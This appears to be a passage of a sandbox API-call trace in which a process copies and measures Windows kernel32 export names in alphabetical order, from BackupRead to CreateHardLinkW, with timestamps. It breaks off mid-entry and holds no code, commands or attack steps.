lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BackupRead" | out: lpString1="BackupRead") returned="BackupRead" [0077.235] lstrlenA (lpString="BACKUPREAD") returned 10 [0077.235] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BackupSeek" | out: lpString1="BackupSeek") returned="BackupSeek" [0077.235] lstrlenA (lpString="BACKUPSEEK") returned 10 [0077.235] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BackupWrite" | out: lpString1="BackupWrite") returned="BackupWrite" [0077.235] lstrlenA (lpString="BACKUPWRITE") returned 11 [0077.235] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseCheckAppcompatCache" | out: lpString1="BaseCheckAppcompatCache") returned="BaseCheckAppcompatCache" [0077.235] lstrlenA (lpString="BASECHECKAPPCOMPATCACHE") returned 23 [0077.235] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseCheckAppcompatCacheEx" | out: lpString1="BaseCheckAppcompatCacheEx") returned="BaseCheckAppcompatCacheEx" [0077.235] lstrlenA (lpString="BASECHECKAPPCOMPATCACHEEX") returned 25 [0077.235] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseCheckRunApp" | out: lpString1="BaseCheckRunApp") returned="BaseCheckRunApp" [0077.235] lstrlenA (lpString="BASECHECKRUNAPP") returned 15 [0077.235] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseCleanupAppcompatCacheSupport" | out: lpString1="BaseCleanupAppcompatCacheSupport") returned="BaseCleanupAppcompatCacheSupport" [0077.235] lstrlenA (lpString="BASECLEANUPAPPCOMPATCACHESUPPORT") returned 32 [0077.236] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseDllReadWriteIniFile" | out: lpString1="BaseDllReadWriteIniFile") returned="BaseDllReadWriteIniFile" [0077.236] lstrlenA (lpString="BASEDLLREADWRITEINIFILE") returned 23 [0077.236] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseDumpAppcompatCache" | out: lpString1="BaseDumpAppcompatCache") returned="BaseDumpAppcompatCache" [0077.236] lstrlenA (lpString="BASEDUMPAPPCOMPATCACHE") returned 22 [0077.236] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseFlushAppcompatCache" | out: lpString1="BaseFlushAppcompatCache") returned="BaseFlushAppcompatCache" [0077.236] lstrlenA (lpString="BASEFLUSHAPPCOMPATCACHE") returned 23 [0077.236] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseFormatObjectAttributes" | out: lpString1="BaseFormatObjectAttributes") returned="BaseFormatObjectAttributes" [0077.236] lstrlenA (lpString="BASEFORMATOBJECTATTRIBUTES") returned 26 [0077.236] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseFormatTimeOut" | out: lpString1="BaseFormatTimeOut") returned="BaseFormatTimeOut" [0077.236] lstrlenA (lpString="BASEFORMATTIMEOUT") returned 17 [0077.236] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseGenerateAppCompatData" | out: lpString1="BaseGenerateAppCompatData") returned="BaseGenerateAppCompatData" [0077.236] lstrlenA (lpString="BASEGENERATEAPPCOMPATDATA") returned 25 [0077.236] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseGetNamedObjectDirectory" | out: lpString1="BaseGetNamedObjectDirectory") returned="BaseGetNamedObjectDirectory" [0077.236] lstrlenA (lpString="BASEGETNAMEDOBJECTDIRECTORY") returned 27 [0077.236] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseInitAppcompatCacheSupport" | out: lpString1="BaseInitAppcompatCacheSupport") returned="BaseInitAppcompatCacheSupport" [0077.236] lstrlenA (lpString="BASEINITAPPCOMPATCACHESUPPORT") returned 29 [0077.236] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseIsAppcompatInfrastructureDisabled" | out: lpString1="BaseIsAppcompatInfrastructureDisabled") returned="BaseIsAppcompatInfrastructureDisabled" [0077.236] lstrlenA (lpString="BASEISAPPCOMPATINFRASTRUCTUREDISABLED") returned 37 [0077.236] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseQueryModuleData" | out: lpString1="BaseQueryModuleData") returned="BaseQueryModuleData" [0077.236] lstrlenA (lpString="BASEQUERYMODULEDATA") returned 19 [0077.236] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseSetLastNTError" | out: lpString1="BaseSetLastNTError") returned="BaseSetLastNTError" [0077.236] lstrlenA (lpString="BASESETLASTNTERROR") returned 18 [0077.236] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseThreadInitThunk" | out: lpString1="BaseThreadInitThunk") returned="BaseThreadInitThunk" [0077.236] lstrlenA (lpString="BASETHREADINITTHUNK") returned 19 [0077.236] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseUpdateAppcompatCache" | out: lpString1="BaseUpdateAppcompatCache") returned="BaseUpdateAppcompatCache" [0077.236] lstrlenA (lpString="BASEUPDATEAPPCOMPATCACHE") returned 24 [0077.236] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseVerifyUnicodeString" | out: lpString1="BaseVerifyUnicodeString") returned="BaseVerifyUnicodeString" [0077.236] lstrlenA (lpString="BASEVERIFYUNICODESTRING") returned 23 [0077.236] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="Basep8BitStringToDynamicUnicodeString" | out: lpString1="Basep8BitStringToDynamicUnicodeString") returned="Basep8BitStringToDynamicUnicodeString" [0077.236] lstrlenA (lpString="BASEP8BITSTRINGTODYNAMICUNICODESTRING") returned 37 [0077.236] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepAllocateActivationContextActivationBlock" | out: lpString1="BasepAllocateActivationContextActivationBlock") returned="BasepAllocateActivationContextActivationBlock" [0077.236] lstrlenA (lpString="BASEPALLOCATEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 45 [0077.236] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepAnsiStringToDynamicUnicodeString" | out: lpString1="BasepAnsiStringToDynamicUnicodeString") returned="BasepAnsiStringToDynamicUnicodeString" [0077.236] lstrlenA (lpString="BASEPANSISTRINGTODYNAMICUNICODESTRING") returned 37 [0077.236] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepCheckAppCompat" | out: lpString1="BasepCheckAppCompat") returned="BasepCheckAppCompat" [0077.236] lstrlenA (lpString="BASEPCHECKAPPCOMPAT") returned 19 [0077.237] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepCheckBadapp" | out: lpString1="BasepCheckBadapp") returned="BasepCheckBadapp" [0077.237] lstrlenA (lpString="BASEPCHECKBADAPP") returned 16 [0077.237] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepCheckWinSaferRestrictions" | out: lpString1="BasepCheckWinSaferRestrictions") returned="BasepCheckWinSaferRestrictions" [0077.237] lstrlenA (lpString="BASEPCHECKWINSAFERRESTRICTIONS") returned 30 [0077.237] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepFreeActivationContextActivationBlock" | out: lpString1="BasepFreeActivationContextActivationBlock") returned="BasepFreeActivationContextActivationBlock" [0077.237] lstrlenA (lpString="BASEPFREEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 41 [0077.237] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepFreeAppCompatData" | out: lpString1="BasepFreeAppCompatData") returned="BasepFreeAppCompatData" [0077.237] lstrlenA (lpString="BASEPFREEAPPCOMPATDATA") returned 22 [0077.237] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepMapModuleHandle" | out: lpString1="BasepMapModuleHandle") returned="BasepMapModuleHandle" [0077.237] lstrlenA (lpString="BASEPMAPMODULEHANDLE") returned 20 [0077.237] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="Beep" | out: lpString1="Beep") returned="Beep" [0077.237] lstrlenA (lpString="BEEP") returned 4 [0077.237] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BeginUpdateResourceA" | out: lpString1="BeginUpdateResourceA") returned="BeginUpdateResourceA" [0077.237] lstrlenA (lpString="BEGINUPDATERESOURCEA") returned 20 [0077.237] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BeginUpdateResourceW" | out: lpString1="BeginUpdateResourceW") returned="BeginUpdateResourceW" [0077.237] lstrlenA (lpString="BEGINUPDATERESOURCEW") returned 20 [0077.237] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BindIoCompletionCallback" | out: lpString1="BindIoCompletionCallback") returned="BindIoCompletionCallback" [0077.237] lstrlenA (lpString="BINDIOCOMPLETIONCALLBACK") returned 24 [0077.237] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BuildCommDCBA" | out: lpString1="BuildCommDCBA") returned="BuildCommDCBA" [0077.237] lstrlenA (lpString="BUILDCOMMDCBA") returned 13 [0077.237] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BuildCommDCBAndTimeoutsA" | out: lpString1="BuildCommDCBAndTimeoutsA") returned="BuildCommDCBAndTimeoutsA" [0077.237] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSA") returned 24 [0077.237] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BuildCommDCBAndTimeoutsW" | out: lpString1="BuildCommDCBAndTimeoutsW") returned="BuildCommDCBAndTimeoutsW" [0077.237] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSW") returned 24 [0077.237] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BuildCommDCBW" | out: lpString1="BuildCommDCBW") returned="BuildCommDCBW" [0077.237] lstrlenA (lpString="BUILDCOMMDCBW") returned 13 [0077.237] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CallNamedPipeA" | out: lpString1="CallNamedPipeA") returned="CallNamedPipeA" [0077.237] lstrlenA (lpString="CALLNAMEDPIPEA") returned 14 [0077.237] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CallNamedPipeW" | out: lpString1="CallNamedPipeW") returned="CallNamedPipeW" [0077.237] lstrlenA (lpString="CALLNAMEDPIPEW") returned 14 [0077.237] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CallbackMayRunLong" | out: lpString1="CallbackMayRunLong") returned="CallbackMayRunLong" [0077.237] lstrlenA (lpString="CALLBACKMAYRUNLONG") returned 18 [0077.237] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelDeviceWakeupRequest" | out: lpString1="CancelDeviceWakeupRequest") returned="CancelDeviceWakeupRequest" [0077.237] lstrlenA (lpString="CANCELDEVICEWAKEUPREQUEST") returned 25 [0077.237] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelIo" | out: lpString1="CancelIo") returned="CancelIo" [0077.237] lstrlenA (lpString="CANCELIO") returned 8 [0077.238] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelIoEx" | out: lpString1="CancelIoEx") returned="CancelIoEx" [0077.238] lstrlenA (lpString="CANCELIOEX") returned 10 [0077.238] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelSynchronousIo" | out: lpString1="CancelSynchronousIo") returned="CancelSynchronousIo" [0077.238] lstrlenA (lpString="CANCELSYNCHRONOUSIO") returned 19 [0077.238] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelThreadpoolIo" | out: lpString1="CancelThreadpoolIo") returned="CancelThreadpoolIo" [0077.238] lstrlenA (lpString="CANCELTHREADPOOLIO") returned 18 [0077.238] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelTimerQueueTimer" | out: lpString1="CancelTimerQueueTimer") returned="CancelTimerQueueTimer" [0077.238] lstrlenA (lpString="CANCELTIMERQUEUETIMER") returned 21 [0077.238] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelWaitableTimer" | out: lpString1="CancelWaitableTimer") returned="CancelWaitableTimer" [0077.238] lstrlenA (lpString="CANCELWAITABLETIMER") returned 19 [0077.238] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ChangeTimerQueueTimer" | out: lpString1="ChangeTimerQueueTimer") returned="ChangeTimerQueueTimer" [0077.238] lstrlenA (lpString="CHANGETIMERQUEUETIMER") returned 21 [0077.238] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckElevation" | out: lpString1="CheckElevation") returned="CheckElevation" [0077.238] lstrlenA (lpString="CHECKELEVATION") returned 14 [0077.238] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckElevationEnabled" | out: lpString1="CheckElevationEnabled") returned="CheckElevationEnabled" [0077.238] lstrlenA (lpString="CHECKELEVATIONENABLED") returned 21 [0077.238] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckForReadOnlyResource" | out: lpString1="CheckForReadOnlyResource") returned="CheckForReadOnlyResource" [0077.238] lstrlenA (lpString="CHECKFORREADONLYRESOURCE") returned 24 [0077.238] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckNameLegalDOS8Dot3A" | out: lpString1="CheckNameLegalDOS8Dot3A") returned="CheckNameLegalDOS8Dot3A" [0077.238] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3A") returned 23 [0077.238] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckNameLegalDOS8Dot3W" | out: lpString1="CheckNameLegalDOS8Dot3W") returned="CheckNameLegalDOS8Dot3W" [0077.238] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3W") returned 23 [0077.238] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckRemoteDebuggerPresent" | out: lpString1="CheckRemoteDebuggerPresent") returned="CheckRemoteDebuggerPresent" [0077.238] lstrlenA (lpString="CHECKREMOTEDEBUGGERPRESENT") returned 26 [0077.238] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ClearCommBreak" | out: lpString1="ClearCommBreak") returned="ClearCommBreak" [0077.238] lstrlenA (lpString="CLEARCOMMBREAK") returned 14 [0077.238] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ClearCommError" | out: lpString1="ClearCommError") returned="ClearCommError" [0077.238] lstrlenA (lpString="CLEARCOMMERROR") returned 14 [0077.238] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseConsoleHandle" | out: lpString1="CloseConsoleHandle") returned="CloseConsoleHandle" [0077.238] lstrlenA (lpString="CLOSECONSOLEHANDLE") returned 18 [0077.238] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseHandle" | out: lpString1="CloseHandle") returned="CloseHandle" [0077.238] lstrlenA (lpString="CLOSEHANDLE") returned 11 [0077.238] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ClosePrivateNamespace" | out: lpString1="ClosePrivateNamespace") returned="ClosePrivateNamespace" [0077.238] lstrlenA (lpString="CLOSEPRIVATENAMESPACE") returned 21 [0077.238] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseProfileUserMapping" | out: lpString1="CloseProfileUserMapping") returned="CloseProfileUserMapping" [0077.239] lstrlenA (lpString="CLOSEPROFILEUSERMAPPING") returned 23 [0077.239] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpool" | out: lpString1="CloseThreadpool") returned="CloseThreadpool" [0077.239] lstrlenA (lpString="CLOSETHREADPOOL") returned 15 [0077.239] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolCleanupGroup" | out: lpString1="CloseThreadpoolCleanupGroup") returned="CloseThreadpoolCleanupGroup" [0077.239] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUP") returned 27 [0077.239] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolCleanupGroupMembers" | out: lpString1="CloseThreadpoolCleanupGroupMembers") returned="CloseThreadpoolCleanupGroupMembers" [0077.239] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUPMEMBERS") returned 34 [0077.239] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolIo" | out: lpString1="CloseThreadpoolIo") returned="CloseThreadpoolIo" [0077.239] lstrlenA (lpString="CLOSETHREADPOOLIO") returned 17 [0077.239] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolTimer" | out: lpString1="CloseThreadpoolTimer") returned="CloseThreadpoolTimer" [0077.239] lstrlenA (lpString="CLOSETHREADPOOLTIMER") returned 20 [0077.239] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolWait" | out: lpString1="CloseThreadpoolWait") returned="CloseThreadpoolWait" [0077.239] lstrlenA (lpString="CLOSETHREADPOOLWAIT") returned 19 [0077.239] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolWork" | out: lpString1="CloseThreadpoolWork") returned="CloseThreadpoolWork" [0077.239] lstrlenA (lpString="CLOSETHREADPOOLWORK") returned 19 [0077.239] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CmdBatNotification" | out: lpString1="CmdBatNotification") returned="CmdBatNotification" [0077.239] lstrlenA (lpString="CMDBATNOTIFICATION") returned 18 [0077.239] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CommConfigDialogA" | out: lpString1="CommConfigDialogA") returned="CommConfigDialogA" [0077.239] lstrlenA (lpString="COMMCONFIGDIALOGA") returned 17 [0077.239] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CommConfigDialogW" | out: lpString1="CommConfigDialogW") returned="CommConfigDialogW" [0077.239] lstrlenA (lpString="COMMCONFIGDIALOGW") returned 17 [0077.239] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareCalendarDates" | out: lpString1="CompareCalendarDates") returned="CompareCalendarDates" [0077.239] lstrlenA (lpString="COMPARECALENDARDATES") returned 20 [0077.239] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareFileTime" | out: lpString1="CompareFileTime") returned="CompareFileTime" [0077.239] lstrlenA (lpString="COMPAREFILETIME") returned 15 [0077.239] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareStringA" | out: lpString1="CompareStringA") returned="CompareStringA" [0077.239] lstrlenA (lpString="COMPARESTRINGA") returned 14 [0077.239] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareStringEx" | out: lpString1="CompareStringEx") returned="CompareStringEx" [0077.239] lstrlenA (lpString="COMPARESTRINGEX") returned 15 [0077.239] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareStringOrdinal" | out: lpString1="CompareStringOrdinal") returned="CompareStringOrdinal" [0077.239] lstrlenA (lpString="COMPARESTRINGORDINAL") returned 20 [0077.239] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareStringW" | out: lpString1="CompareStringW") returned="CompareStringW" [0077.239] lstrlenA (lpString="COMPARESTRINGW") returned 14 [0077.239] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConnectNamedPipe" | out: lpString1="ConnectNamedPipe") returned="ConnectNamedPipe" [0077.239] lstrlenA (lpString="CONNECTNAMEDPIPE") returned 16 [0077.239] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConsoleMenuControl" | out: lpString1="ConsoleMenuControl") returned="ConsoleMenuControl" [0077.240] lstrlenA (lpString="CONSOLEMENUCONTROL") returned 18 [0077.240] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ContinueDebugEvent" | out: lpString1="ContinueDebugEvent") returned="ContinueDebugEvent" [0077.240] lstrlenA (lpString="CONTINUEDEBUGEVENT") returned 18 [0077.240] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertCalDateTimeToSystemTime" | out: lpString1="ConvertCalDateTimeToSystemTime") returned="ConvertCalDateTimeToSystemTime" [0077.240] lstrlenA (lpString="CONVERTCALDATETIMETOSYSTEMTIME") returned 30 [0077.240] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertDefaultLocale" | out: lpString1="ConvertDefaultLocale") returned="ConvertDefaultLocale" [0077.240] lstrlenA (lpString="CONVERTDEFAULTLOCALE") returned 20 [0077.240] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertFiberToThread" | out: lpString1="ConvertFiberToThread") returned="ConvertFiberToThread" [0077.240] lstrlenA (lpString="CONVERTFIBERTOTHREAD") returned 20 [0077.240] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertNLSDayOfWeekToWin32DayOfWeek" | out: lpString1="ConvertNLSDayOfWeekToWin32DayOfWeek") returned="ConvertNLSDayOfWeekToWin32DayOfWeek" [0077.240] lstrlenA (lpString="CONVERTNLSDAYOFWEEKTOWIN32DAYOFWEEK") returned 35 [0077.240] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertSystemTimeToCalDateTime" | out: lpString1="ConvertSystemTimeToCalDateTime") returned="ConvertSystemTimeToCalDateTime" [0077.240] lstrlenA (lpString="CONVERTSYSTEMTIMETOCALDATETIME") returned 30 [0077.240] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertThreadToFiber" | out: lpString1="ConvertThreadToFiber") returned="ConvertThreadToFiber" [0077.240] lstrlenA (lpString="CONVERTTHREADTOFIBER") returned 20 [0077.240] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertThreadToFiberEx" | out: lpString1="ConvertThreadToFiberEx") returned="ConvertThreadToFiberEx" [0077.240] lstrlenA (lpString="CONVERTTHREADTOFIBEREX") returned 22 [0077.240] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyContext" | out: lpString1="CopyContext") returned="CopyContext" [0077.240] lstrlenA (lpString="COPYCONTEXT") returned 11 [0077.240] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileA" | out: lpString1="CopyFileA") returned="CopyFileA" [0077.240] lstrlenA (lpString="COPYFILEA") returned 9 [0077.240] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileExA" | out: lpString1="CopyFileExA") returned="CopyFileExA" [0077.240] lstrlenA (lpString="COPYFILEEXA") returned 11 [0077.240] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileExW" | out: lpString1="CopyFileExW") returned="CopyFileExW" [0077.240] lstrlenA (lpString="COPYFILEEXW") returned 11 [0077.240] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileTransactedA" | out: lpString1="CopyFileTransactedA") returned="CopyFileTransactedA" [0077.240] lstrlenA (lpString="COPYFILETRANSACTEDA") returned 19 [0077.240] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileTransactedW" | out: lpString1="CopyFileTransactedW") returned="CopyFileTransactedW" [0077.240] lstrlenA (lpString="COPYFILETRANSACTEDW") returned 19 [0077.240] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileW" | out: lpString1="CopyFileW") returned="CopyFileW" [0077.240] lstrlenA (lpString="COPYFILEW") returned 9 [0077.240] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyLZFile" | out: lpString1="CopyLZFile") returned="CopyLZFile" [0077.240] lstrlenA (lpString="COPYLZFILE") returned 10 [0077.240] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateActCtxA" | out: lpString1="CreateActCtxA") returned="CreateActCtxA" [0077.240] lstrlenA (lpString="CREATEACTCTXA") returned 13 [0077.240] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateActCtxW" | out: lpString1="CreateActCtxW") returned="CreateActCtxW" [0077.241] lstrlenA (lpString="CREATEACTCTXW") returned 13 [0077.241] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateBoundaryDescriptorA" | out: lpString1="CreateBoundaryDescriptorA") returned="CreateBoundaryDescriptorA" [0077.241] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORA") returned 25 [0077.241] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateBoundaryDescriptorW" | out: lpString1="CreateBoundaryDescriptorW") returned="CreateBoundaryDescriptorW" [0077.241] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORW") returned 25 [0077.241] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateConsoleScreenBuffer" | out: lpString1="CreateConsoleScreenBuffer") returned="CreateConsoleScreenBuffer" [0077.241] lstrlenA (lpString="CREATECONSOLESCREENBUFFER") returned 25 [0077.241] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryA" | out: lpString1="CreateDirectoryA") returned="CreateDirectoryA" [0077.241] lstrlenA (lpString="CREATEDIRECTORYA") returned 16 [0077.241] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryExA" | out: lpString1="CreateDirectoryExA") returned="CreateDirectoryExA" [0077.241] lstrlenA (lpString="CREATEDIRECTORYEXA") returned 18 [0077.241] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryExW" | out: lpString1="CreateDirectoryExW") returned="CreateDirectoryExW" [0077.241] lstrlenA (lpString="CREATEDIRECTORYEXW") returned 18 [0077.241] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryTransactedA" | out: lpString1="CreateDirectoryTransactedA") returned="CreateDirectoryTransactedA" [0077.241] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDA") returned 26 [0077.241] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryTransactedW" | out: lpString1="CreateDirectoryTransactedW") returned="CreateDirectoryTransactedW" [0077.241] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDW") returned 26 [0077.241] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryW" | out: lpString1="CreateDirectoryW") returned="CreateDirectoryW" [0077.241] lstrlenA (lpString="CREATEDIRECTORYW") returned 16 [0077.241] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateEventA" | out: lpString1="CreateEventA") returned="CreateEventA" [0077.241] lstrlenA (lpString="CREATEEVENTA") returned 12 [0077.241] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateEventExA" | out: lpString1="CreateEventExA") returned="CreateEventExA" [0077.241] lstrlenA (lpString="CREATEEVENTEXA") returned 14 [0077.241] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateEventExW" | out: lpString1="CreateEventExW") returned="CreateEventExW" [0077.241] lstrlenA (lpString="CREATEEVENTEXW") returned 14 [0077.241] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateEventW" | out: lpString1="CreateEventW") returned="CreateEventW" [0077.241] lstrlenA (lpString="CREATEEVENTW") returned 12 [0077.241] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFiber" | out: lpString1="CreateFiber") returned="CreateFiber" [0077.241] lstrlenA (lpString="CREATEFIBER") returned 11 [0077.241] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFiberEx" | out: lpString1="CreateFiberEx") returned="CreateFiberEx" [0077.241] lstrlenA (lpString="CREATEFIBEREX") returned 13 [0077.241] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileA" | out: lpString1="CreateFileA") returned="CreateFileA" [0077.241] lstrlenA (lpString="CREATEFILEA") returned 11 [0077.241] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileMappingA" | out: lpString1="CreateFileMappingA") returned="CreateFileMappingA" [0077.241] lstrlenA (lpString="CREATEFILEMAPPINGA") returned 18 [0077.241] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileMappingNumaA" | out: lpString1="CreateFileMappingNumaA") returned="CreateFileMappingNumaA" [0077.242] lstrlenA (lpString="CREATEFILEMAPPINGNUMAA") returned 22 [0077.242] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileMappingNumaW" | out: lpString1="CreateFileMappingNumaW") returned="CreateFileMappingNumaW" [0077.242] lstrlenA (lpString="CREATEFILEMAPPINGNUMAW") returned 22 [0077.242] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileMappingW" | out: lpString1="CreateFileMappingW") returned="CreateFileMappingW" [0077.242] lstrlenA (lpString="CREATEFILEMAPPINGW") returned 18 [0077.242] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileTransactedA" | out: lpString1="CreateFileTransactedA") returned="CreateFileTransactedA" [0077.242] lstrlenA (lpString="CREATEFILETRANSACTEDA") returned 21 [0077.242] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileTransactedW" | out: lpString1="CreateFileTransactedW") returned="CreateFileTransactedW" [0077.242] lstrlenA (lpString="CREATEFILETRANSACTEDW") returned 21 [0077.242] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileW" | out: lpString1="CreateFileW") returned="CreateFileW" [0077.242] lstrlenA (lpString="CREATEFILEW") returned 11 [0077.242] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateHardLinkA" | out: lpString1="CreateHardLinkA") returned="CreateHardLinkA" [0077.242] lstrlenA (lpString="CREATEHARDLINKA") returned 15 [0077.242] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateHardLinkTransactedA" | out: lpString1="CreateHardLinkTransactedA") returned="CreateHardLinkTransactedA" [0077.242] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDA") returned 25 [0077.242] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateHardLinkTransactedW" | out: lpString1="CreateHardLinkTransactedW") returned="CreateHardLinkTransactedW" [0077.242] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDW") returned 25 [0077.242] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateHardLinkW" | out: lpString1="CreateHardLinkW") returned="CreateHardLinkW" [0077.242] lstrlenA 